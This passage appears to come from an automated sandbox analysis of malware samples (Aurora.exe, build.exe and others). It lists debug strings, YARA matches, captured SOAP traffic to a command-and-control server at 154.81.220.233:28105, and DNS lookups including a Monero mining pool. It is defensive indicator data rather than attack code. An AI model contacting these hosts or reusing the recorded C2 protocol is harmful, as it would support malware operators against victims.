                      Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbL source: build.exe, 00000004.00000002.2918227460.0000000000B5F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: lib.pdb source: Aurora.exe, 00000000.00000002.1994816261.00000000042E6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbP> source: Aurora.exe, 00000000.00000002.1987273449.0000000002089000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: Aurora.exe, 00000000.00000002.1987273449.0000000002061000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: .pdb. source: Aurora.exe, 00000000.00000002.1986631416.0000000001EF9000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\Aurora.PDB0 source: Aurora.exe, 00000000.00000002.1987273449.0000000002089000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.ServiceModel.pdb693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: build.exe, 00000004.00000002.2918227460.0000000000B82000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Aurora.exe, 00000000.00000002.1994816261.00000000042E6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.ServiceModel.pdb source: build.exe, 00000004.00000002.2918227460.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000004.00000002.2918227460.0000000000B27000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: build.exe, 00000004.00000002.2918227460.0000000000B5F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: n.pdbService source: build.exe, 00000004.00000002.2916704878.0000000000987000.00000004.00000010.00020000.00000000.sdmp

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: auroraforge.art
                      Source: global trafficTCP traffic: 154.81.220.233 ports 28105,0,1,2,5,8
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 28105
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 1
                      Source: Yara matchFile source: 7.2.OneDrive.exe.46f41b0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.OneDrive.exe.43d6b80.1.raw.unpack, type: UNPACKEDPE
                      Source: global trafficTCP traffic: 192.168.2.4:49730 -> 154.81.220.233:28105
                      Source: global trafficTCP traffic: 192.168.2.4:49748 -> 123.123.123.123:55713
                      Source: global trafficTCP traffic: 192.168.2.4:49755 -> 51.79.71.77:14444
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                      Source: Joe Sandbox ViewASN Name: MULTA-ASN1US MULTA-ASN1US
                      Source: Joe Sandbox ViewASN Name: CHINA169-BJChinaUnicomBeijingProvinceNetworkCN CHINA169-BJChinaUnicomBeijingProvinceNetworkCN
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.81.220.233
                      Source: global trafficDNS traffic detected: DNS query: auroraforge.art
                      Source: global trafficDNS traffic detected: DNS query: thesirenmika.com
                      Source: global trafficDNS traffic detected: DNS query: xmr-us-east1.nanopool.org
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 154.81.220.233:28105Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: Aurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1/dashboardid
                      Source: build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.81.220.233:
                      Source: build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002891000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.81.220.233:28105
                      Source: build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.81.220.233:28105/
                      Source: build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.81.220.233:28105t-
                      Source: powershell.exe, 0000000D.00000002.1759509854.0000000002D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: powershell.exe, 0000000D.00000002.1764000122.00000000049D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                      Source: powershell.exe, 0000000D.00000002.1782478788.00000000058EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1934227592.0000028FBF695000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2464311316.000002943ED02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000016.00000002.1775465681.0000028FAF849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: build.exe, 00000004.00000002.2937734948.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: powershell.exe, 0000000D.00000002.1764000122.00000000049D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1775465681.0000028FAF849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: build.exe, 00000004.00000002.2937734948.0000000002926000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: build.exe, 00000004.00000002.2937734948.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: build.exe, 00000004.00000002.2937734948.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                      Source: build.exe, 00000004.00000002.2937734948.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: build.exe, 00000004.00000002.2937734948.0000000002891000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000007.00000002.1727999189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1764000122.0000000004881000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2933944946.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1775465681.0000028FAF621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2050954318.000002942EC91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000000D.00000002.1764000122.00000000049D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1775465681.0000028FAF849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: build.exe, 00000004.00000002.2937734948.0000000002926000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: build.exe, 00000004.00000002.2937734948.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                      Source: build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpo
                      Source: build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpo$
                      Source: build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpo(
                      Source: build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpo4
                      Source: build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/
                      Source: build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckCon
                      Source: build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                      Source: build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectLR
                      Source: build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                      Source: build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                      Source: build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsLR
                      Source: build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                      Source: build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                      Source: build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesLR
                      Source: build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                      Source: build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                      Source: build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentLR
                      Source: build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                      Source: build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                      Source: build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateLR
                      Source: build.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                      Source: powershell.exe, 00000016.00000002.1775465681.0000028FAF849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000016.00000002.1775465681.0000028FAF621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2050954318.000002942EC91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 0000000D.00000002.1764000122.0000000004881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: powershell.exe, 00000016.00000002.1775465681.0000028FAF849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: build.exe, 00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                      Source: OneDrive.exe, 00000007.00000002.1728900790.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000007.00000002.1728900790.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.1787802985.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: build.exe, 00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                      Source: Aurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/file/bot%s/%sindex
                      Source: powershell.exe, 00000032.00000002.2464311316.000002943ED02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000032.00000002.2464311316.000002943ED02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000032.00000002.2464311316.000002943ED02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000016.00000002.1775465681.0000028FAF849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: Aurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/electron/electron/releases/download/v%s/electron-v%s-%s-%s.zipInvalid
                      Source: Aurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/sapics/ip-location-db/raw/master/dbip-city/dbip-city-ipv4.csv.gzjson:
                      Source: powershell.exe, 0000000D.00000002.1790765252.00000000071D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.coV
                      Source: powershell.exe, 0000000D.00000002.1790765252.00000000071D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.coVpnClient.psd1mpatib
                      Source: build.exe, 00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
